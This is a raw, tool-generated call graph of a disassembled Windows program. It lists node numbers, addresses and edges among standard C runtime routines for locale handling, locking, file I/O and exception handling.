21427 f651b4 21426->21427 21427->21400 21428 f652af GetModuleHandleExW 21427->21428 21429 f652ee GetProcAddress 21428->21429 21430 f6530f 21428->21430 21429->21430 21431 f65302 21429->21431 21432 f65315 FreeLibrary 21430->21432 21433 f651c0 21430->21433 21431->21430 21432->21433 21433->21400 21434->21414 21437 f650a3 __FrameHandler3::FrameUnwindToState 21435->21437 21436 f6510a std::locale::_Setgloballocale 21436->21416 21437->21436 21442 f66fb0 21437->21442 21463 f61fe0 LeaveCriticalSection 21439->21463 21441 f65079 21441->21406 21441->21419 21443 f66fbc __EH_prolog3 21442->21443 21446 f66d08 21443->21446 21445 f66fe3 std::locale::_Init 21445->21436 21447 f66d14 __FrameHandler3::FrameUnwindToState 21446->21447 21454 f61f98 EnterCriticalSection 21447->21454 21449 f66d22 21455 f66ec0 21449->21455 21454->21449 21456 f66d2f 21455->21456 21457 f66edf 21455->21457 21459 f66d57 21456->21459 21457->21456 21458 f681d7 ___free_lconv_mon 14 API calls 21457->21458 21458->21456 21462 f61fe0 LeaveCriticalSection 21459->21462 21461 f66d40 21461->21445 21462->21461 21463->21441 21469 f6ceec GetPEB 21464->21469 21467 f65297 GetPEB 21468 f65223 21467->21468 21468->21422 21468->21423 21470 f6cf06 21469->21470 21471 f65292 21469->21471 21473 f68535 21470->21473 21471->21467 21471->21468 21474 f684b2 std::_Lockit::_Lockit 5 API calls 21473->21474 21475 f68551 21474->21475 21475->21471 21477 f67174 ___scrt_uninitialize_crt 21476->21477 21478 f67162 21476->21478 21477->19315 21479 f67170 21478->21479 21481 f62c79 21478->21481 21479->19315 21484 f62b06 21481->21484 21487 f629fa 21484->21487 21488 f62a06 __FrameHandler3::FrameUnwindToState 21487->21488 21495 f61f98 EnterCriticalSection 21488->21495 21490 f62a10 ___scrt_uninitialize_crt 21491 f62a7c 21490->21491 21496 f6296e 21490->21496 21504 f62a9a 21491->21504 21495->21490 21497 f6297a __FrameHandler3::FrameUnwindToState 21496->21497 21507 f5f9e9 EnterCriticalSection 21497->21507 21499 f62984 ___scrt_uninitialize_crt 21503 f629bd 21499->21503 21508 f62c14 21499->21508 21521 f629ee 21503->21521 21553 f61fe0 LeaveCriticalSection 21504->21553 21506 f62a88 21506->21479 21507->21499 21509 f62c29 _Fputc 21508->21509 21510 f62c30 21509->21510 21511 f62c3b 21509->21511 21513 f62b06 ___scrt_uninitialize_crt 71 API calls 21510->21513 21512 f62bab ___scrt_uninitialize_crt 69 API calls 21511->21512 21514 f62c45 21512->21514 21520 f62c36 21513->21520 21516 f68c78 _Ungetc 44 API calls 21514->21516 21514->21520 21515 f5fa59 _Fputc 44 API calls 21517 f62c73 21515->21517 21518 f62c5c 21516->21518 21517->21503 21524 f6bfa3 21518->21524 21520->21515 21552 f5f9fd LeaveCriticalSection 21521->21552 21523 f629dc 21523->21490 21525 f6bfb4 21524->21525 21527 f6bfc1 21524->21527 21526 f61f44 __dosmaperr 14 API calls 21525->21526 21534 f6bfb9 21526->21534 21528 f6c00a 21527->21528 21530 f6bfe8 21527->21530 21529 f61f44 __dosmaperr 14 API calls 21528->21529 21531 f6c00f 21529->21531 21535 f6bf01 21530->21535 21533 f61e30 _Ungetc 44 API calls 21531->21533 21533->21534 21534->21520 21536 f6bf0d __FrameHandler3::FrameUnwindToState 21535->21536 21548 f70753 EnterCriticalSection 21536->21548 21538 f6bf1c 21540 f709cf __wsopen_s 44 API calls 21538->21540 21547 f6bf61 21538->21547 21539 f61f44 __dosmaperr 14 API calls 21541 f6bf68 21539->21541 21542 f6bf48 FlushFileBuffers 21540->21542 21542->21541 21543 f6bf54 GetLastError 21542->21543 21547->21539 21548->21538 21552->21523 21553->21506 21554 f6b055 21555 f68c78 _Ungetc 44 API calls 21554->21555 21556 f6b062 21555->21556 21557 f6b06e 21556->21557 21560 f6b0ba 21556->21560 21571 f6b3eb 21556->21571 21559 f6b11c 21579 f6b245 21559->21579 21560->21557 21560->21559 21561 f6a443 44 API calls 21560->21561 21563 f6b10f 21561->21563 21563->21559 21566 f6bea5 21563->21566 21567 f6817a __dosmaperr 14 API calls 21566->21567 21568 f6bec2 21567->21568 21569 f681d7 ___free_lconv_mon 14 API calls 21568->21569 21570 f6becc 21569->21570 21570->21559 21572 f6b405 21571->21572 21573 f6b401 21571->21573 21574 f709cf __wsopen_s 44 API calls 21572->21574 21578 f6b454 21572->21578 21573->21560 21575 f6b426 21574->21575 21576 f6b42e SetFilePointerEx 21575->21576 21575->21578 21577 f6b445 GetFileSizeEx 21576->21577 21576->21578 21577->21578 21578->21560 21580 f68c78 _Ungetc 44 API calls 21579->21580 21581 f6b254 21580->21581 21582 f6b267 21581->21582 21583 f6b2fa 21581->21583 21585 f6b284 21582->21585 21588 f6b2ab 21582->21588 21584 f6ad4d __wsopen_s 69 API calls 21583->21584 21587 f6b12d 21584->21587 21586 f6ad4d __wsopen_s 69 API calls 21585->21586 21586->21587 21588->21587 21590 f6c7f5 21588->21590 21591 f6c809 _Fputc 21590->21591 21596 f6c64c 21591->21596 21594 f5fa59 _Fputc 44 API calls 21595 f6c82d 21594->21595 21595->21587 21599 f6c658 __FrameHandler3::FrameUnwindToState 21596->21599 21597 f6c660 21597->21594 21598 f6c736 21600 f61db3 _Fputc 44 API calls 21598->21600 21599->21597 21599->21598 21601 f6c6b4 21599->21601 21600->21597 21607 f70753 EnterCriticalSection 21601->21607 21603 f6c6ba 21604 f6c6df 21603->21604 21608 f6c772 21603->21608 21614 f6c72e 21604->21614 21607->21603 21609 f709cf __wsopen_s 44 API calls 21608->21609 21610 f6c784 21609->21610 21611 f6c7a0 SetFilePointerEx 21610->21611 21612 f6c78c __wsopen_s 21610->21612 21611->21612 21613 f6c7b8 GetLastError 21611->21613 21612->21604 21613->21612 21617 f70808 LeaveCriticalSection 21614->21617 21616 f6c734 21616->21597 21617->21616 22624 f59856 22625 f5985d 22624->22625 22626 f59862 22624->22626 22628 f5f9e9 EnterCriticalSection 22625->22628 22628->22626 24489 f62e2a 24490 f62e35 24489->24490 24491 f62e4a 24489->24491 24492 f61f44 __dosmaperr 14 API calls 24490->24492 24493 f62e67 24491->24493 24494 f62e52 24491->24494 24495 f62e3a 24492->24495 24503 f6c60b 24493->24503 24496 f61f44 __dosmaperr 14 API calls 24494->24496 24498 f61e30 _Ungetc 44 API calls 24495->24498 24499 f62e57 24496->24499 24501 f62e45 24498->24501 24502 f61e30 _Ungetc 44 API calls 24499->24502 24500 f62e62 24502->24500 24504 f6c61f _Fputc 24503->24504 24509 f6c020 24504->24509 24507 f5fa59 _Fputc 44 API calls 24508 f6c639 24507->24508 24508->24500 24510 f6c02c __FrameHandler3::FrameUnwindToState 24509->24510 24511 f6c056 24510->24511 24512 f6c033 24510->24512 24520 f5f9e9 EnterCriticalSection 24511->24520 24513 f61db3 _Fputc 44 API calls 24512->24513 24515 f6c04c 24513->24515 24515->24507 24516 f6c064 24521 f6c0af 24516->24521 24518 f6c073 24534 f6c0a5 24518->24534 24520->24516 24522 f6c0e6 24521->24522 24523 f6c0be 24521->24523 24525 f68c78 _Ungetc 44 API calls 24522->24525 24524 f61db3 _Fputc 44 API calls 24523->24524 24533 f6c0d9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 24524->24533 24526 f6c0ef 24525->24526 24537 f6c835 24526->24537 24529 f6c199 24540 f6c40f 24529->24540 24531 f6c1b0 24531->24533 24552 f6c250 24531->24552 24533->24518 24559 f5f9fd LeaveCriticalSection 24534->24559 24536 f6c0ad 24536->24515 24538 f6c64c 48 API calls 24537->24538 24539 f6c10d 24538->24539 24539->24529 24539->24531 24539->24533 24541 f6c41e __wsopen_s 24540->24541 24542 f68c78 _Ungetc 44 API calls 24541->24542 24544 f6c43a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 24542->24544 24543 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 24545 f6c5b8 24543->24545 24546 f6c835 48 API calls 24544->24546 24548 f6c446 24544->24548 24545->24533 24547 f6c49a 24546->24547 24547->24548 24549 f6c4cc ReadFile 24547->24549 24548->24543 24549->24548 24550 f6c4f3 24549->24550 24551 f6c835 48 API calls 24550->24551 24551->24548 24553 f68c78 _Ungetc 44 API calls 24552->24553 24554 f6c263 24553->24554 24555 f6c835 48 API calls 24554->24555 24558 f6c2ab __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 24554->24558 24556 f6c2fe 24555->24556 24557 f6c835 48 API calls 24556->24557 24556->24558 24557->24558 24558->24533 24559->24536 22712 f52c1c 22713 f52c26 22712->22713 22714 f52c3a 22713->22714 22727 f51390 22713->22727 22738 f529e0 22714->22738 22728 f513a0 22727->22728 22744 f58257 22728->22744 22730 f513a6 22731 f52c70 22730->22731 22732 f52c94 22731->22732 22733 f5b1e3 codecvt 16 API calls 22732->22733 22734 f52c9b 22733->22734 22735 f52d43 codecvt 22734->22735 22736 f61e40 std::ios_base::_Init 44 API calls 22734->22736 22735->22714 22737 f52d5e 22736->22737 22739 f529e8 22738->22739 22805 f513b0 22739->22805 22752 f5c0ba 22744->22752 22747 f582dd 22748 f61e91 ___std_exception_copy 15 API calls 22747->22748 22751 f582d9 shared_ptr 22748->22751 22749 f582d0 22755 f57d27 22749->22755 22751->22730 22758 f5e4ac 22752->22758 22754 f58281 22754->22747 22754->22749 22754->22751 22756 f61e91 ___std_exception_copy 15 API calls 22755->22756 22757 f57d70 shared_ptr 22756->22757 22757->22751 22786 f5e4ba 22758->22786 22760 f5e4b1 22760->22754 22761 f67a10 std::locale::_Setgloballocale 2 API calls 22760->22761 22762 f5f7b8 22761->22762 22763 f5f7c3 22762->22763 22764 f67a55 std::locale::_Setgloballocale 44 API calls 22762->22764 22765 f5f7cd IsProcessorFeaturePresent 22763->22765 22766 f5f7ec 22763->22766 22764->22763 22767 f5f7d9 22765->22767 22768 f6535e std::locale::_Setgloballocale 23 API calls 22766->22768 22769 f61c34 std::locale::_Setgloballocale 8 API calls 22767->22769 22770 f5f7f6 __FrameHandler3::FrameUnwindToState 22768->22770 22769->22766 22771 f5f80a 22770->22771 22774 f5f82a 22770->22774 22772 f61f44 __dosmaperr 14 API calls 22771->22772 22773 f5f80f 22772->22773 22775 f61e30 _Ungetc 44 API calls 22773->22775 22776 f5f83c 22774->22776 22777 f5f82f 22774->22777 22779 f5f81a 22775->22779 22778 f67c48 17 API calls 22776->22778 22780 f61f44 __dosmaperr 14 API calls 22777->22780 22781 f5f845 22778->22781 22779->22754 22780->22779 22782 f5f84c 22781->22782 22783 f5f859 22781->22783 22784 f61f44 __dosmaperr 14 API calls 22782->22784 22785 f5f897 LeaveCriticalSection 22783->22785 22784->22779 22785->22779 22787 f5e4c6 GetLastError 22786->22787 22788 f5e4c3 22786->22788 22800 f5f673 22787->22800 22788->22760 22791 f5e540 SetLastError 22791->22760 22792 f5f6ae ___vcrt_FlsSetValue 6 API calls 22793 f5e4f4 __Getctype 22792->22793 22794 f5e51c 22793->22794 22796 f5f6ae ___vcrt_FlsSetValue 6 API calls 22793->22796 22799 f5e4fa 22793->22799 22795 f5f6ae ___vcrt_FlsSetValue 6 API calls 22794->22795 22797 f5e530 22794->22797 22795->22797 22796->22794 22798 f61bf0 std::locale::_Locimp::~_Locimp 14 API calls 22797->22798 22798->22799 22799->22791 22801 f5f512 ___vcrt_FlsGetValue 5 API calls 22800->22801 22802 f5f68d 22801->22802 22803 f5f6a5 TlsGetValue 22802->22803 22804 f5e4db 22802->22804 22803->22804 22804->22791 22804->22792 22804->22799 22808 f58342 22805->22808 22809 f5835d __InternalCxxFrameHandler 22808->22809 22816 f58373 22808->22816 22812 f5c0d1 CallUnexpected RaiseException 22809->22812 22810 f583e4 RaiseException 22811 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 22810->22811 22813 f513ba 22811->22813 22812->22816 22814 f58406 22815 f5f7b3 __purecall 44 API calls 22814->22815 22817 f5840b 22815->22817 22816->22810 22816->22814 22818 f583c4 __alloca_probe_16 22816->22818 22818->22810 24639 f59ff1 24640 f59ffd __EH_prolog3_GS 24639->24640 24642 f5a04c 24640->24642 24646 f5a014 24640->24646 24649 f5a066 24640->24649 24641 f5b4a9 5 API calls 24643 f5a130 24641->24643 24653 f590a8 24642->24653 24646->24641 24648 f556e0 44 API calls 24648->24646 24650 f5a115 24649->24650 24651 f5a150 24649->24651 24656 f59d8a 24649->24656 24660 f62d1e 24649->24660 24650->24648 24651->24650 24680 f634cc 24651->24680 24693 f6240b 24653->24693 24657 f59d96 24656->24657 24658 f59db1 24656->24658 24657->24649 24777 f590ec 24658->24777 24661 f62d2a __FrameHandler3::FrameUnwindToState 24660->24661 24662 f62d34 24661->24662 24663 f62d4c 24661->24663 24665 f61f44 __dosmaperr 14 API calls 24662->24665 24794 f5f9e9 EnterCriticalSection 24663->24794 24667 f62d39 24665->24667 24666 f62d56 24668 f62df2 24666->24668 24670 f68c78 _Ungetc 44 API calls 24666->24670 24669 f61e30 _Ungetc 44 API calls 24667->24669 24795 f62cd7 24668->24795 24672 f62d44 24669->24672 24675 f62d73 24670->24675 24672->24649 24673 f62df8 24802 f62e22 24673->24802 24675->24668 24676 f62dca 24675->24676 24677 f61f44 __dosmaperr 14 API calls 24676->24677 24678 f62dcf 24677->24678 24679 f61e30 _Ungetc 44 API calls 24678->24679 24679->24672 24681 f634d8 __FrameHandler3::FrameUnwindToState 24680->24681 24682 f634f4 24681->24682 24683 f634df 24681->24683 24806 f5f9e9 EnterCriticalSection 24682->24806 24684 f61f44 __dosmaperr 14 API calls 24683->24684 24686 f634e4 24684->24686 24688 f61e30 _Ungetc 44 API calls 24686->24688 24687 f634fe 24807 f633d3 24687->24807 24691 f634ef 24688->24691 24691->24651 24694 f62417 __FrameHandler3::FrameUnwindToState 24693->24694 24695 f62435 24694->24695 24696 f6241e 24694->24696 24706 f5f9e9 EnterCriticalSection 24695->24706 24697 f61f44 __dosmaperr 14 API calls 24696->24697 24699 f62423 24697->24699 24701 f61e30 _Ungetc 44 API calls 24699->24701 24700 f62441 24707 f6229b 24700->24707 24703 f590b3 24701->24703 24703->24646 24704 f6244c 24741 f6247a 24704->24741 24706->24700 24708 f6231e 24707->24708 24709 f622b8 24707->24709 24712 f68c78 _Ungetc 44 API calls 24708->24712 24730 f62315 24708->24730 24710 f68c78 _Ungetc 44 API calls 24709->24710 24711 f622be 24710->24711 24713 f622e1 24711->24713 24715 f68c78 _Ungetc 44 API calls 24711->24715 24714 f62333 24712->24714 24713->24708 24724 f622fc 24713->24724 24717 f68c78 _Ungetc 44 API calls 24714->24717 24732 f62356 24714->24732 24716 f622ca 24715->24716 24716->24713 24722 f68c78 _Ungetc 44 API calls 24716->24722 24718 f6233f 24717->24718 24723 f68c78 _Ungetc 44 API calls 24718->24723 24718->24732 24719 f62d13 44 API calls 24721 f62376 24719->24721 24728 f6356c __Getctype 44 API calls 24721->24728 24721->24730 24725 f622d6 24722->24725 24727 f6234b 24723->24727 24724->24730 24744 f62d13 24724->24744 24726 f68c78 _Ungetc 44 API calls 24725->24726 24726->24713 24729 f68c78 _Ungetc 44 API calls 24727->24729 24731 f6238e 24728->24731 24729->24732 24730->24704 24733 f623b8 24731->24733 24735 f62d13 44 API calls 24731->24735 24732->24719 24732->24730 24751 f6a3f7 24733->24751 24736 f6239f 24735->24736 24736->24733 24738 f623a5 24736->24738 24739 f634cc 44 API calls 24738->24739 24739->24730 24740 f61f44 __dosmaperr 14 API calls 24740->24730 24776 f5f9fd LeaveCriticalSection 24741->24776 24743 f62480 24743->24703 24745 f62cd7 24744->24745 24746 f61f44 __dosmaperr 14 API calls 24745->24746 24748 f62cf8 24745->24748 24747 f62ce8 24746->24747 24749 f61e30 _Ungetc 44 API calls 24747->24749 24748->24724 24750 f62cf3 24749->24750 24750->24724 24752 f6a40a _Fputc 24751->24752 24757 f6a2c4 24752->24757 24755 f5fa59 _Fputc 44 API calls 24756 f623cc 24755->24756 24756->24730 24756->24740 24758 f6a2d8 24757->24758 24767 f6a2e8 24757->24767 24759 f6a30d 24758->24759 24760 f615b0 _Fputc 44 API calls 24758->24760 24758->24767 24761 f6a341 24759->24761 24762 f6a31e 24759->24762 24760->24759 24764 f6a3bd 24761->24764 24765 f6a369 24761->24765 24761->24767 24769 f75822 24762->24769 24766 f6edaf __wsopen_s MultiByteToWideChar 24764->24766 24765->24767 24768 f6edaf __wsopen_s MultiByteToWideChar 24765->24768 24766->24767 24767->24755 24768->24767 24772 f77d73 24769->24772 24775 f77d9e _Fputc 24772->24775 24773 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 24774 f7583d 24773->24774 24774->24767 24775->24773 24776->24743 24778 f59187 24777->24778 24779 f5910b 24777->24779 24780 f51440 std::ios_base::_Init 46 API calls 24778->24780 24784 f568c0 24779->24784 24781 f5918c 24780->24781 24783 f59127 codecvt 24783->24657 24785 f568cb 24784->24785 24789 f568dc 24784->24789 24786 f568d6 24785->24786 24787 f513c0 codecvt 24785->24787 24788 f5b1e3 codecvt 16 API calls 24786->24788 24790 f5c0d1 CallUnexpected RaiseException 24787->24790 24788->24789 24789->24783 24791 f513da 24790->24791 24792 f5be7b ___std_exception_copy 45 API calls 24791->24792 24793 f51401 24792->24793 24793->24783 24794->24666 24796 f62ce3 24795->24796 24799 f62cf8 24795->24799 24797 f61f44 __dosmaperr 14 API calls 24796->24797 24798 f62ce8 24797->24798 24800 f61e30 _Ungetc 44 API calls 24798->24800 24799->24673 24801 f62cf3 24800->24801 24801->24673 24805 f5f9fd LeaveCriticalSection 24802->24805 24804 f62e28 24804->24672 24805->24804 24806->24687 24808 f633eb 24807->24808 24810 f6345b 24807->24810 24809 f68c78 _Ungetc 44 API calls 24808->24809 24814 f633f1 24809->24814 24811 f63453 24810->24811 24812 f6bea5 _Ungetc 14 API calls 24810->24812 24818 f63537 24811->24818 24812->24811 24813 f63443 24815 f61f44 __dosmaperr 14 API calls 24813->24815 24814->24810 24814->24813 24816 f63448 24815->24816 24817 f61e30 _Ungetc 44 API calls 24816->24817 24817->24811 24821 f5f9fd LeaveCriticalSection 24818->24821 24820 f6353d 24820->24691 24821->24820 24866 f59be0 24870 f59c05 24866->24870 24871 f59c01 24866->24871 24867 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 24868 f59c6d 24867->24868 24870->24871 24872 f59cbb 24870->24872 24873 f59c49 24870->24873 24871->24867 24872->24871 24874 f61bb6 70 API calls 24872->24874 24873->24871 24875 f590cf 24873->24875 24874->24871 24878 f6267e 24875->24878 24879 f62691 _Fputc 24878->24879 24884 f62482 24879->24884 24882 f5fa59 _Fputc 44 API calls 24883 f590dd 24882->24883 24883->24871 24885 f6248e __FrameHandler3::FrameUnwindToState 24884->24885 24886 f62495 24885->24886 24887 f624ba 24885->24887 24889 f61db3 _Fputc 44 API calls 24886->24889 24895 f5f9e9 EnterCriticalSection 24887->24895 24891 f624b0 24889->24891 24890 f624c9 24896 f62546 24890->24896 24891->24882 24895->24890 24897 f6257d 24896->24897 24898 f6256b _Fputc 24896->24898 24899 f68c78 _Ungetc 44 API calls 24897->24899 24901 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 24898->24901 24900 f62584 24899->24900 24902 f68c78 _Ungetc 44 API calls 24900->24902 24904 f625ac 24900->24904 24903 f624da 24901->24903 24905 f62595 24902->24905 24918 f6250a 24903->24918 24904->24898 24907 f68c78 _Ungetc 44 API calls 24904->24907 24905->24904 24906 f68c78 _Ungetc 44 API calls 24905->24906 24908 f625a1 24906->24908 24909 f625df 24907->24909 24910 f68c78 _Ungetc 44 API calls 24908->24910 24911 f62602 24909->24911 24912 f68c78 _Ungetc 44 API calls 24909->24912 24910->24904 24911->24898 24913 f6a120 _Fputc 46 API calls 24911->24913 24914 f625eb 24912->24914 24913->24898 24914->24911 24915 f68c78 _Ungetc 44 API calls 24914->24915 24916 f625f7 24915->24916 24917 f68c78 _Ungetc 44 API calls 24916->24917 24917->24911 24921 f5f9fd LeaveCriticalSection 24918->24921 24920 f62510 24920->24891 24921->24920 24926 f68bec 24927 f68bf8 __FrameHandler3::FrameUnwindToState 24926->24927 24938 f61f98 EnterCriticalSection 24927->24938 24929 f68bff 24939 f706b5 24929->24939 24931 f68c1d 24963 f68c43 24931->24963 24938->24929 24940 f706c1 __FrameHandler3::FrameUnwindToState 24939->24940 24941 f706eb 24940->24941 24942 f706ca 24940->24942 24966 f61f98 EnterCriticalSection 24941->24966 24944 f61f44 __dosmaperr 14 API calls 24942->24944 24945 f706cf 24944->24945 24946 f61e30 _Ungetc 44 API calls 24945->24946 24947 f68c0e 24946->24947 24947->24931 24952 f68a86 GetStartupInfoW 24947->24952 24948 f70723 24967 f7074a 24948->24967 24949 f706f7 24949->24948 24951 f70605 __wsopen_s 15 API calls 24949->24951 24951->24949 24953 f68aa3 24952->24953 24955 f68b37 24952->24955 24954 f706b5 44 API calls 24953->24954 24953->24955 24956 f68acb 24954->24956 24958 f68b3c 24955->24958 24956->24955 24957 f68afb GetFileType 24956->24957 24957->24956 24959 f68b43 24958->24959 24960 f68b86 GetStdHandle 24959->24960 24961 f68be8 24959->24961 24962 f68b99 GetFileType 24959->24962 24960->24959 24961->24931 24962->24959 24971 f61fe0 LeaveCriticalSection 24963->24971 24965 f68c2e 24966->24949 24970 f61fe0 LeaveCriticalSection 24967->24970 24969 f70751 24969->24947 24970->24969 24971->24965 21630 f67fd8 21635 f67dae 21630->21635 21632 f68017 21636 f67dcd 21635->21636 21637 f67de0 21636->21637 21645 f67df5 21636->21645 21638 f61f44 __dosmaperr 14 API calls 21637->21638 21639 f67de5 21638->21639 21640 f61e30 _Ungetc 44 API calls 21639->21640 21641 f67df0 21640->21641 21641->21632 21652 f73c2c 21641->21652 21642 f61f44 __dosmaperr 14 API calls 21643 f67fc6 21642->21643 21644 f61e30 _Ungetc 44 API calls 21643->21644 21644->21641 21650 f67f15 21645->21650 21655 f734be 21645->21655 21647 f67f65 21648 f734be 44 API calls 21647->21648 21647->21650 21649 f67f83 21648->21649 21649->21650 21651 f734be 44 API calls 21649->21651 21650->21641 21650->21642 21651->21650 21687 f735f6 21652->21687 21656 f73515 21655->21656 21657 f734cd 21655->21657 21669 f7352b 21656->21669 21659 f734d3 21657->21659 21661 f734f0 21657->21661 21660 f61f44 __dosmaperr 14 API calls 21659->21660 21663 f734d8 21660->21663 21665 f61f44 __dosmaperr 14 API calls 21661->21665 21668 f7350e 21661->21668 21662 f734e3 21662->21647 21664 f61e30 _Ungetc 44 API calls 21663->21664 21664->21662 21666 f734ff 21665->21666 21667 f61e30 _Ungetc 44 API calls 21666->21667 21667->21662 21668->21647 21670 f73555 21669->21670 21671 f7353b 21669->21671 21673 f73574 21670->21673 21674 f7355d 21670->21674 21672 f61f44 __dosmaperr 14 API calls 21671->21672 21677 f73540 21672->21677 21675 f73597 21673->21675 21676 f73580 21673->21676 21678 f61f44 __dosmaperr 14 API calls 21674->21678 21683 f63abd __wsopen_s 44 API calls 21675->21683 21686 f7354b 21675->21686 21679 f61f44 __dosmaperr 14 API calls 21676->21679 21680 f61e30 _Ungetc 44 API calls 21677->21680 21681 f73562 21678->21681 21682 f73585 21679->21682 21680->21686 21684 f61e30 _Ungetc 44 API calls 21681->21684 21685 f61e30 _Ungetc 44 API calls 21682->21685 21683->21686 21684->21686 21685->21686 21686->21662 21690 f73602 __FrameHandler3::FrameUnwindToState 21687->21690 21688 f73609 21689 f61f44 __dosmaperr 14 API calls 21688->21689 21691 f7360e 21689->21691 21690->21688 21692 f73634 21690->21692 21693 f61e30 _Ungetc 44 API calls 21691->21693 21698 f73bbe 21692->21698 21697 f73618 21693->21697 21697->21632 21711 f6f094 21698->21711 21703 f73bf4 21705 f681d7 ___free_lconv_mon 14 API calls 21703->21705 21706 f73658 21703->21706 21705->21706 21707 f7368b 21706->21707 21708 f736b5 21707->21708 21709 f73691 21707->21709 21708->21697 22105 f70808 LeaveCriticalSection 21709->22105 21712 f63abd __wsopen_s 44 API calls 21711->21712 21713 f6f0a6 21712->21713 21714 f6f0b8 21713->21714 21765 f68575 21713->21765 21716 f6474b 21714->21716 21768 f645d7 21716->21768 21719 f73c4c 21720 f73c69 21719->21720 21721 f73c97 21720->21721 21722 f73c7e 21720->21722 21803 f7082b 21721->21803 21724 f61f31 __dosmaperr 14 API calls 21722->21724 21726 f73c83 21724->21726 21729 f61f44 __dosmaperr 14 API calls 21726->21729 21727 f73ca5 21730 f61f31 __dosmaperr 14 API calls 21727->21730 21728 f73cbc 21816 f73905 CreateFileW 21728->21816 21732 f73c90 21729->21732 21733 f73caa 21730->21733 21732->21703 21734 f61f44 __dosmaperr 14 API calls 21733->21734 21734->21726 21735 f73d72 GetFileType 21736 f73dc4 21735->21736 21737 f73d7d GetLastError 21735->21737 21818 f70776 21736->21818 21741 f61eea __dosmaperr 14 API calls 21737->21741 21738 f73d47 GetLastError 21740 f61eea __dosmaperr 14 API calls 21738->21740 21739 f73cf5 21739->21735 21739->21738 21817 f73905 CreateFileW 21739->21817 21740->21726 21743 f73d8b CloseHandle 21741->21743 21743->21726 21746 f73db4 21743->21746 21745 f73d3a 21745->21735 21745->21738 21748 f61f44 __dosmaperr 14 API calls 21746->21748 21750 f73db9 21748->21750 21749 f73e31 21754 f73e38 21749->21754 21848 f736b7 21749->21848 21750->21726 21842 f68dd3 21754->21842 21755 f73e74 21755->21732 21757 f73ef0 CloseHandle 21755->21757 21875 f73905 CreateFileW 21757->21875 21759 f73f1b 21760 f73f51 21759->21760 21761 f73f25 GetLastError 21759->21761 21760->21732 21762 f61eea __dosmaperr 14 API calls 21761->21762 21763 f73f31 21762->21763 21764 f7093e __wsopen_s 15 API calls 21763->21764 21764->21760 21766 f682c9 std::_Lockit::_Lockit 5 API calls 21765->21766 21767 f6857d 21766->21767 21767->21714 21769 f645e5 21768->21769 21770 f645ff 21768->21770 21786 f6478c 21769->21786 21772 f64606 21770->21772 21773 f64625 21770->21773 21778 f645ef 21772->21778 21790 f647cd 21772->21790 21774 f6edaf __wsopen_s MultiByteToWideChar 21773->21774 21775 f64634 21774->21775 21777 f6463b GetLastError 21775->21777 21780 f64661 21775->21780 21782 f647cd __wsopen_s 15 API calls 21775->21782 21795 f61eea 21777->21795 21778->21703 21778->21719 21780->21778 21783 f6edaf __wsopen_s MultiByteToWideChar 21780->21783 21782->21780 21785 f64678 21783->21785 21784 f61f44 __dosmaperr 14 API calls 21784->21778 21785->21777 21785->21778 21787 f64797 21786->21787 21788 f6479f 21786->21788 21789 f681d7 ___free_lconv_mon 14 API calls 21787->21789 21788->21778 21789->21788 21791 f6478c __wsopen_s 14 API calls 21790->21791 21792 f647db 21791->21792 21800 f6480c 21792->21800 21796 f61f31 __dosmaperr 14 API calls 21795->21796 21797 f61ef5 __dosmaperr 21796->21797 21798 f61f44 __dosmaperr 14 API calls 21797->21798 21799 f61f08 21798->21799 21799->21784 21801 f694cc std::_Locinfo::_Locinfo_ctor 15 API calls 21800->21801 21802 f647ec 21801->21802 21802->21778 21804 f70837 __FrameHandler3::FrameUnwindToState 21803->21804 21876 f61f98 EnterCriticalSection 21804->21876 21806 f7083e 21808 f70863 21806->21808 21812 f708d2 EnterCriticalSection 21806->21812 21814 f70885 21806->21814 21880 f70605 21808->21880 21812->21814 21815 f708df LeaveCriticalSection 21812->21815 21877 f70935 21814->21877 21815->21806 21816->21739 21817->21745 21819 f70785 21818->21819 21820 f707ee 21818->21820 21819->21820 21826 f707ab __wsopen_s 21819->21826 21821 f61f44 __dosmaperr 14 API calls 21820->21821 21822 f707f3 21821->21822 21823 f61f31 __dosmaperr 14 API calls 21822->21823 21824 f707db 21823->21824 21824->21749 21827 f73b14 21824->21827 21825 f707d5 SetStdHandle 21825->21824 21826->21824 21826->21825 21828 f73b6e 21827->21828 21829 f73b3c 21827->21829 21828->21749 21829->21828 21889 f6c853 21829->21889 21832 f73b72 21895 f75fcf 21832->21895 21833 f73b5c 21834 f61f31 __dosmaperr 14 API calls 21833->21834 21836 f73b61 21834->21836 21836->21828 21840 f61f44 __dosmaperr 14 API calls 21836->21840 21837 f73b84 21838 f73b9a 21837->21838 21958 f7787e 21837->21958 21838->21836 21839 f6c853 __wsopen_s 46 API calls 21838->21839 21839->21836 21840->21828 21843 f68de6 _Fputc 21842->21843 21844 f68e03 __wsopen_s 47 API calls 21843->21844 21845 f68df2 21844->21845 21846 f5fa59 _Fputc 44 API calls 21845->21846 21847 f68dfe 21846->21847 21847->21732 21849 f737cb 21848->21849 21850 f736e8 21848->21850 21849->21754 21849->21755 21858 f73708 21850->21858 22092 f653b0 21850->22092 21852 f736ff 21853 f738fa 21852->21853 21852->21858 21854 f61e5d __Getctype 11 API calls 21853->21854 21855 f73904 21854->21855 21856 f737f1 21856->21849 21857 f75fcf __wsopen_s 56 API calls 21856->21857 21862 f737fb 21856->21862 21863 f73823 21857->21863 21858->21849 21858->21856 21859 f6c853 __wsopen_s 46 API calls 21858->21859 21861 f737c2 21858->21861 21860 f737db 21859->21860 21860->21861 21867 f737e6 21860->21867 21861->21849 21861->21862 22099 f6ad16 21861->22099 21862->21849 21869 f61f44 __dosmaperr 14 API calls 21862->21869 21863->21849 21863->21862 21864 f7388e 21863->21864 21865 f7385b 21863->21865 21866 f73868 21863->21866 21873 f6c853 __wsopen_s 46 API calls 21864->21873 21870 f61f44 __dosmaperr 14 API calls 21865->21870 21866->21864 21872 f73870 21866->21872 21871 f6c853 __wsopen_s 